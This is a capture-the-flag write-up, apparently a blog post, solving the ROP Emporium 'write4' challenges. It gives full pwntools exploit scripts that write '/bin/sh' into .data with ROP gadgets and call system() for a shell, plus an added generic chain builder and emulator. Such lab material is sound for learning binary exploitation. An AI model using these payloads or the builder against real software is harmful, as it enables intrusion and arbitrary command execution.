write4

Author: n0va | Published 2019-01-11 23:14

    write432:

    Same overflow point as before, but this time the binary does not contain the string /bin/sh, so we have to write it into .data or .bss ourselves. The two variants differ only in the destination address, so only the .data version is discussed here. In 32-bit, "/bin/sh" (8 bytes including the terminating NUL) has to be written to .data in two 4-byte stores. Before settling on a destination, confirm with readelf -S that the section is writable and has room at that address. First, use ROPgadget (ROPgadget --binary write432) to find a usable write gadget:


    (ROPgadget output screenshot omitted.) The two gadgets used here:
    0x08048670 : mov dword ptr [edi], ebp ; ret
    0x080486da : pop edi ; pop ebp ; ret
    

    exp:

    # -*- coding:UTF-8 -*-
    from pwn import *
    sh = process('./write432')
    data_addr = 0x0804A028        # write "/bin/sh" into .data
    # bss_addr = 0x0804A040       # alternative: write into .bss
    system_plt = 0x08048430       # system@plt
    pop_edi_ebp = 0x080486da      # pop edi ; pop ebp ; ret
    mov_edi_ebp = 0x08048670      # mov dword ptr [edi], ebp ; ret
    payload = b""
    payload += b"A" * 0x28 + p32(0)       # filler + saved ebp; the return address follows
    # first store: [data_addr] = "/bin"
    payload += p32(pop_edi_ebp)
    # payload += p32(bss_addr)
    payload += p32(data_addr)             # edi = destination
    payload += b"/bin"                    # ebp = first 4 bytes of the string
    payload += p32(mov_edi_ebp)
    # second store: [data_addr + 4] = "/sh\0"
    payload += p32(pop_edi_ebp)
    # payload += p32(bss_addr + 4)
    payload += p32(data_addr + 4)
    payload += b"/sh\x00"                 # the NUL terminates the C string
    payload += p32(mov_edi_ebp)
    # call system("/bin/sh"): 32-bit cdecl takes the argument from the stack
    payload += p32(system_plt)
    payload += p32(0)                     # fake return address for system
    # payload += p32(bss_addr)
    payload += p32(data_addr)             # argument: pointer to "/bin/sh"
    sh.sendline(payload)
    sh.interactive()
    

    write4:
    Same idea, except that in 64-bit the whole "/bin/sh\0" (8 bytes) fits in one register, so it is written to .data in a single store:

    # -*- coding:UTF-8 -*-
    from pwn import *
    sh = process('./write4')
    # bss_addr = 0x0000000000601060    # alternative: write into .bss
    data_addr = 0x0000000000601050     # write "/bin/sh" into .data
    mov_r14_r15 = 0x0000000000400820   # mov qword ptr [r14], r15 ; ret
    pop_r14_r15 = 0x0000000000400890   # pop r14 ; pop r15 ; ret
    system_plt = 0x00000000004005E0    # system@plt
    pop_rdi = 0x0000000000400893       # pop rdi ; ret
    payload = b""
    payload += b"A" * 0x20 + p64(0)    # filler + saved rbp; the return address follows
    # single store: [data_addr] = "/bin/sh\0"
    payload += p64(pop_r14_r15)
    payload += p64(data_addr)          # r14 = destination
    # payload += p64(bss_addr)
    payload += b"/bin/sh\x00"          # r15 = the whole string, NUL included
    payload += p64(mov_r14_r15)
    # call system("/bin/sh"): on x86-64 the first argument goes in rdi
    payload += p64(pop_rdi)
    # payload += p64(bss_addr)
    payload += p64(data_addr)
    payload += p64(system_plt)
    sh.sendline(payload)
    sh.interactive()
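The two exploits above are the same write-what-where idiom at two word sizes: a pop/pop/ret gadget loads a destination pointer and a value from the stack, and a mov [reg], reg ; ret gadget stores it. The following added example (not n0va's code, and independent of pwntools so it runs offline) generalises that idiom to any string and both architectures: it NUL-terminates and word-splits the string, emits one gadget pair per word, appends the architecture-specific system() call, and then walks the chain with a tiny emulator of those two gadgets so the resulting .data layout can be checked before the binary is run. Gadget, section and system@plt addresses are the ones from the two exploits; the argument layout for system() follows the page's payloads (stack argument plus fake return address on x86, pop rdi ; ret on x86-64).

```python
import struct

# Addresses copied from the two exploits above (ROP Emporium write432 / write4).
# The builder and emulator around them are an added illustration, not the
# original author's code.
ARCH = {
    32: {"word": 4, "fmt": "<I",
         "pop_pop_ret": 0x080486da,   # pop edi ; pop ebp ; ret
         "mov_ret":     0x08048670,   # mov dword ptr [edi], ebp ; ret
         "data":        0x0804A028,   # writable .data address used by the page
         "system_plt":  0x08048430,
         "pop_rdi":     None,         # cdecl: argument goes on the stack
         "pad":         0x28},        # filler before the saved frame pointer
    64: {"word": 8, "fmt": "<Q",
         "pop_pop_ret": 0x400890,     # pop r14 ; pop r15 ; ret
         "mov_ret":     0x400820,     # mov qword ptr [r14], r15 ; ret
         "data":        0x601050,
         "system_plt":  0x4005E0,
         "pop_rdi":     0x400893,     # pop rdi ; ret
         "pad":         0x20},
}


def split_into_words(s, word):
    """NUL-terminate s and cut it into word-sized chunks, zero-padding the last.
    "/bin/sh" plus its NUL is 8 bytes: two 4-byte stores on x86, one on x86-64."""
    s = s + b"\x00"
    chunks = [s[i:i + word] for i in range(0, len(s), word)]
    chunks[-1] = chunks[-1].ljust(word, b"\x00")
    return chunks


def write_string_chain(bits, s):
    """Gadget sequence that stores s at .data, one pop/pop/ret + mov pair per word.
    Returns only the write part of the chain (no filler, no system call)."""
    a = ARCH[bits]
    chain = b""
    for i, chunk in enumerate(split_into_words(s, a["word"])):
        chain += struct.pack(a["fmt"], a["pop_pop_ret"])
        chain += struct.pack(a["fmt"], a["data"] + i * a["word"])  # destination register
        chain += chunk                                              # value register: raw bytes
        chain += struct.pack(a["fmt"], a["mov_ret"])                # *destination = value
    return chain


def full_payload(bits, s):
    """Filler, overwritten saved frame pointer, the write chain, then system(.data)."""
    a = ARCH[bits]

    def p(v):
        return struct.pack(a["fmt"], v)

    payload = b"A" * a["pad"] + p(0) + write_string_chain(bits, s)
    if bits == 32:
        # cdecl: return into system@plt, fake return address, argument on the stack
        return payload + p(a["system_plt"]) + p(0) + p(a["data"])
    # SysV x86-64: first argument travels in rdi, so load it with pop rdi ; ret
    return payload + p(a["pop_rdi"]) + p(a["data"]) + p(a["system_plt"])


def emulate_writes(bits, chain):
    """Walk the write chain the way the CPU would and record every store, so the
    string layout can be checked offline before the binary is ever run."""
    a = ARCH[bits]
    w = a["word"]
    words = [struct.unpack(a["fmt"], chain[i:i + w])[0] for i in range(0, len(chain), w)]
    memory, regs, pc = {}, {}, 0
    while pc < len(words):
        if words[pc] == a["pop_pop_ret"]:
            regs["dest"], regs["val"] = words[pc + 1], words[pc + 2]
            pc += 3
        elif words[pc] == a["mov_ret"]:
            memory[regs["dest"]] = struct.pack(a["fmt"], regs["val"])
            pc += 1
        else:
            raise ValueError("unexpected word 0x%x in write chain" % words[pc])
    return memory


def read_c_string(memory, addr, word):
    """Concatenate consecutive stored words starting at addr, stop at the first NUL."""
    out = b""
    while addr in memory:
        out += memory[addr]
        addr += word
    return out.split(b"\x00", 1)[0]


if __name__ == "__main__":
    for bits in (32, 64):
        mem = emulate_writes(bits, write_string_chain(bits, b"/bin/sh"))
        print(bits, len(full_payload(bits, b"/bin/sh")),
              read_c_string(mem, ARCH[bits]["data"], ARCH[bits]["word"]))
```

Running the emulator on the generated chain reproduces the page's layout exactly: on x86 the chain stores "/bin" at data_addr and "/sh\0" at data_addr + 4, on x86-64 a single store covers the whole string. Because split_into_words pads the final chunk, the same builder also handles strings whose length is not a multiple of the word size (for example "/bin/bash" needs three 4-byte stores), which is the case a hand-written payload most often gets wrong.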
    


          Title: write4

          Link: https://www.haomeiwen.com/subject/hbnfdqtx.html